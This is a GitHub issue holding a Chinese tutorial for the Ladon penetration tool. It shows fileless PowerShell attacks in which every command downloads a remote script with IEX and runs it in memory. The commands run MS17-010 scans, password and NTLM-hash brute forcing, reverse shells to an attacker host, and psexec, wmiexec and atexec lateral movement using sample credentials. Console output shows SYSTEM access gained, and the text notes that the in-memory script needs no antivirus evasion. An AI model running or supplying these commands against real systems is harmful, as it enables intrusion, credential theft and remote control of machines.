Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

〖教程〗PowerShell远程内存加载(无文件渗透) #34

Open
k8gege opened this issue Aug 23, 2020 · 0 comments
Open

〖教程〗PowerShell远程内存加载(无文件渗透) #34

k8gege opened this issue Aug 23, 2020 · 0 comments

Comments

@k8gege
Copy link
Owner

k8gege commented Aug 23, 2020

〖教程〗PowerShell远程内存加载(无文件渗透)
http://k8gege.org/Ladon/RemoteLadon.html

前言

本文仅是PowerLadon远程加载例子,并不代表只有这些功能。详情参考完整文档
脚本可直接远程内存加载使用无须免杀,或者有些人比较喜欢的所谓无文件渗透

完整文档:http://k8gege.org/Ladon

架设WEB服务器

使用命令 Ladon web 800 架设一个WEB服务器,用于远程下载脚本
实战可架设在VPS,或者架设在目标内网机器(因为有机器不能出网)
将脚本放在WEB目录下即可,当然大家也可以用IIS或APACHE搭建WEB

image

远程加载MS17010漏洞扫描

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon 192.168.1.8/24 MS17010"
image

远程加载Oracle弱口令爆破

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon 192.168.1.141 OracleScan"

远程加载SmbScan 445端口弱口令爆破

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon 192.168.1.141 SmbScan"
image

远程加载WmiScan 135端口弱口令爆破

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon 192.168.1.141 WmiScan"
image

远程加载SmbHash爆破内网主机(NtlmHash)

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon 192.168.1.40 SmbHash"
image

远程加载WmiHash爆破内网主机(NtlmHash)

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon 192.168.1.40 WmiHash"
image

远程加载反弹NC SHELL

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon ReverseTcp 192.168.1.3 4444 nc"

远程加载PowerCat反弹NC SHELL

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.110:800/Ladon6.6_all.ps1'); Ladon PowerCat 192.168.1.110 4444 cmd"
image

远程加载WMI内网横向

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon wmiexec 192.168.1.40 administrator k8gege520 whoami"
image

远程加载atexec内网横向

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon atexec 192.168.1.40 administrator k8gege520 whoami"
image

远程加载sshexec内网横向

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon sshexec 192.168.1.40 root k8gege520 whoami"
image

远程加载SMBHASH爆破内网主机(NtlmHash)

C:\Users\null\Desktop\runnet>powershell "IEX (New-Object Net.WebClient).Download
String('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon 192.168.1.40 smbhash"
Ladon 6.6
Start: 2020-07-03 17:12:31
Runtime: .net 2.0  OS Arch: x86
OS Name: Microsoft Windows 7 旗舰版
192.168.1.40
load SmbHashScan
ICMP: 192.168.1.40      00-0C-29-0E-1D-50       VMware
192.168.1.40 445 Open
SmbHashCheck 192.168.1.40 administrator BCB4DEE13F1BE64A85DE5769056E3008
Successfully authenticated to the target
Found 192.168.1.40 administrator BCB4DEE13F1BE64A85DE5769056E3008 ISOK
IP Finished!
End: 2020-07-03 17:12:35

远程加载psexec内网横向

C:\Users\null\Desktop\runnet>powershell "IEX (New-Object Net.WebClient).Download
String('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon psexec 192.168.1.40"
Ladon 6.6
Start: 2020-07-03 15:35:55
Runtime: .net 2.0  OS Arch: x86
OS Name: Microsoft Windows 7 旗舰版
Load PsExec
[*] hostname: 192.168.1.40
[*] Choosing net35
[*] Copied net35 service executable to 192.168.1.40
[*] Installed net35 Service on 192.168.1.40
[*] Service Started on 192.168.1.40
psexec> whoami
nt authority\system

远程加载atexec内网横向

C:\Users\null\Desktop\runnet>powershell "IEX (New-Object Net.WebClient).Download
String('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon atexec 192.168.1.40 adm
inistrator k8gege520 whoami"
Ladon 6.6
Start: 2020-07-03 17:07:53
Runtime: .net 2.0  OS Arch: x86
OS Name: Microsoft Windows 7 旗舰版
Load AtExec
SmbExec by 0x7556
IPC Connected
=====================================================
nt authority\system

远程加载wmiexec内网横向

C:\Users\null\Desktop\runnet>powershell "IEX (New-Object Net.WebClient).Download
String('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon wmiexec 192.168.1.40 ad
ministrator k8gege520 whoami"
Ladon 6.6
Start: 2020-07-03 17:17:28
Runtime: .net 2.0  OS Arch: x86
OS Name: Microsoft Windows 7 旗舰版
Load WmiExec
[!] Connecting with administrator
[i] Connecting to 192.168.1.40
[i] Connected
[i] Command: whoami
[i] Running command...
[i] Getting stdout from registry from SOFTWARE\
[i] Full command output received
win-4udh62v7dmn\administrator

获取本机IP与外网IP

image

使用指定用户执行命令

image

窃取指定进程令牌权限执行命令,如LSASS获取SYSTEM权限

image

工具下载

最新版本:https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@k8gege